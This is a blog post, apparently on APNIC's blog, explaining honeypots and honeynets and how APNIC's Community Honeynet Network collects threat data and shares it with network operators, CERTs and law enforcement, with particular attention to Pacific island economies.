I’ve been running honeynets since 2006 with a system deployed in MyCERT (one of the earliest Computer Emergency Response Teams (CERTs) in the region). APNIC is now operating a Community Honeynet Network (CHN) with more than 200 points of data collection mostly in the Asia Pacific region but with nodes in Central and South America, USA, and Europe.
What is a honeynet?
Before discussing honeynets, we have to talk about honeypots. Honeypots are simple systems set up to learn about attackers and to detect attacks. Typically, they are restricted login systems using weak passwords, or systems with known open services like filesystem access, making it easy for attackers to break in, but are isolated into a secure space and heavily monitored.
Honeypots are usually used as an intrusion detection tool. Many security researchers, including Computer Security Incident Response Teams (CSIRTS), deploy honeypots, to learn about tools, tactics, and the attacker’s infrastructure.
A honeynet is a system of honeypots that run cooperatively to increase the amount of data collected at the same time from the same attacks.
Many types of honeypots can now be deployed, depending on the threats you want to monitor, or track. They’re no longer the simple systems of the 90s. Instead of just presenting a login shell, it is possible to have limited interaction to capture commands executed after the login session. We can potentially capture IP addresses or the domain names they download malware from or even capture a download of the tools attackers plan to use when they infect a computer system.
As well as systems that detect intrusions and attacks, honeynets have backend infrastructure to process logs, aggregate and store data, and present information about the threats seen.
How are honeynets being used?
Often, a honeypot or honeynet can be used to determine if a specific attack is being seen. For example, there was a recent announcement from Cisco of a remote code execution on one of their router and switch web frontends. This led the CERT, CSIRT, and FIRST communities to consider whether attackers are actually exploiting these vulnerabilities. In response, they set up honeypots to mimic this compromised system and found there are active attacks ongoing. So, it’s now possible to show that a vulnerability detected and listed as a threat, is being exploited.
CERTs and CSIRTS often respond to incidents via community reports but an alternative to this reactive approach is for them to deploy their own honeypots, which will pick things up from the Internet. This way, CERTs and CSIRTS can work on mitigation ahead of large-scale issues.
Some threats are global, and some are local
Generally, the same kind of address scan attacks can be seen across the Internet. However, we do see certain attacks that only target a certain IP block or Autonomous System numbers (ASNs), perhaps due to the scanning algorithm of the malware. Or there might be some threat actors who do not target certain IPs from certain economies because they don’t want to get in trouble with that specific government. You have to go quite deeply into the analysis to figure that out sometimes.
How APNIC uses honeynet data
APNIC uses information from the honeynet in various ways. Most importantly, APNIC shares the feeds to various related projects — other groups collecting and coordinating threat information — then shares it with their stakeholders, typically network operators.
APNIC’s Dashboard for Autonomous System Health (DASH) is a good example of that coordination. DASH collates threats seen in the honeynet by the origin-AS of APNIC Members, so Members can easily see if any of their IP addresses have hit our honeypots, suggesting they’ve probably been exposed to one of the current risks active in the Internet.
With DASH, and more broadly, curious Members can ask for additional insights. APNIC can present and analyse all the information collected. Most advice sought by Members is recommended next steps. It seems that many engineers lack specialization in this area, leading to a lack of confidence when dealing with the intricacies of malware, botnets, DDoS attacks, and crypto miners.
Taking it to the community
APNIC has increased public engagement at regional meetings and conferences to present this data. Due to the abundance of available data, consistent engagement in discussions about observations within a specific economy or a particular origin-AS is possible.
This facilitates an in-depth exploration of diverse attack types, allowing discussions to be customized according to the audience’s preferences. Topics can include insights into attacker infrastructures, their evolving techniques, and their rapid adaptability in the absence of intervention when these activities carry no consequences for the perpetrators.
Proactive engagement is crucial, as inaction encourages persistent malicious behaviour. Taking remedial measures and being proactive within the community can significantly mitigate the risk of large-scale and ongoing attacks.
In the last year, APNIC has engaged with the CSIRT and network operator communities, and Law Enforcement Agencies (LEAs). LEAs typically seek information on threat actor behaviour. This serves an educational purpose, particularly for officers venturing into cybercrime who may not have firsthand experience with a real attack. Consequently, datasets from honeynets prove highly valuable for their initial training.
In our typical workshops, we establish the honeypot at the outset. Within an hour or two, data collection begins, providing attendees with real-time data to interact with, including packet capture (PCAP) files, log files, and perhaps some binaries uploaded to the system. This hands-on experience allows participants to genuinely immerse themselves in the dynamics of an attack.
How the APNIC Community Honeynet Project is resourced
Sometimes, investment may be funded by the APNIC Foundation. Hosting each node in interesting locations costs between AUD 5 and 10 per month. There’s a large Elasticsearch instance for ingesting all of the datasets and a small server farm to manage log ingestion via the LogStash system.
For an individual honeypot host, using a Raspberry Pi or equivalent single-board computer with Internet access can be a cheap option. The challenge for many individuals lies in the time required to process honeypot data. This is where investment in automation and adding other systems for storage, processing and backup for instance becomes essential, and it is where the APNIC honeynet system excels.
Collaborating with organizations like the Shadowserver Foundation, we advocate for sharing this data beyond our regional scope, reaching areas like South America, Africa and Europe. This ensures broader dissemination of information, helping to secure the Internet more broadly.
The current threat landscape
The sad reality of the Internet threat landscape is that it’s always dynamic. Historically it has never decreased. Certain types of attacks may subside for a week, two weeks, or even a month before resuming activity. This could be due to takedowns of command-and-control networks or the attackers taking a hiatus. Despite the arrest of significant threat actors, their attacks can persist and be passed on to others.
For a large economy like the USA, the issue becomes particularly significant due to the scale involved. Many adopt a reactive stance when facing a DDoS, not considering that attackers are consistently recruiting new nodes for their attacking infrastructure every day. Identifying and eliminating these elements early on is crucial before the actual attack occurs. However, the challenge remains substantial even for smaller economies.
We see this in the island economies of Oceania, which may only have one ISP on an island or group of islands. In small island economies, 100 or more of the home routers getting infected is a significant problem. They may have only one very-small-aperture terminal (VSAT) link and one fibre link and have no security monitoring in place.
During such an event APNIC can help and is known in the Pacific Islands because of this work. APNIC is committed to assisting the establishment of CERTs and CSIRTS in the region. The focus is on avoiding reactive measures and acknowledging challenges related to resources, funding, and personnel.
APNIC can also help contextualize information shown in the media. At its most fundamental, this data can tackle common questions such as ‘Are we under attack?’ and ‘Who is attacking us? And it can clarify the daily challenges faced by people. Having hands-on data is crucial for offering feedback in policy discussions, benefitting security. Having a honeynet node to provide this information is a win-win for everyone.
What’s the future for the honeynet and CERT programs
Honeypots are attractive because they offer visibility into the problem. Without active monitoring, assumptions about the attack’s nature may lead to a false sense of security. Modern attacks, unlike traditional ones, may not simply freeze up a computer. Detection requires vigilant observation and a clear understanding of what to look for.
There’s more work and engagement required to encourage uptake and increase the visibility of the current attack surfaces. In the future we hope to increase engagements for the smaller island economies such as Nauru and Tuvalu, to determine the most effective way for APNIC to support them.
2023 saw the inaugural FIRST Pacific symposium, where resources from across the globe were brought to the region to engage with the CERT and CSIRT community. Established CERTs in the Pacific have also contributed to this initiative.
Encouragingly, we’ve observed active engagement from experts within the broader CERT community, who have proactively reached out to ISPs, telcos, and LEAs, enabling these entities to play their part effectively.
Learning isn’t a one-way street. In the Pacific Islands, there’s a shared ethos of ‘this is a long journey, let’s do this together.’ Adopting this mindset can only benefit the broader security community.
The views expressed by the authors of this blog are their own and do not necessarily reflect the views of APNIC. Please note a Code of Conduct applies to this blog.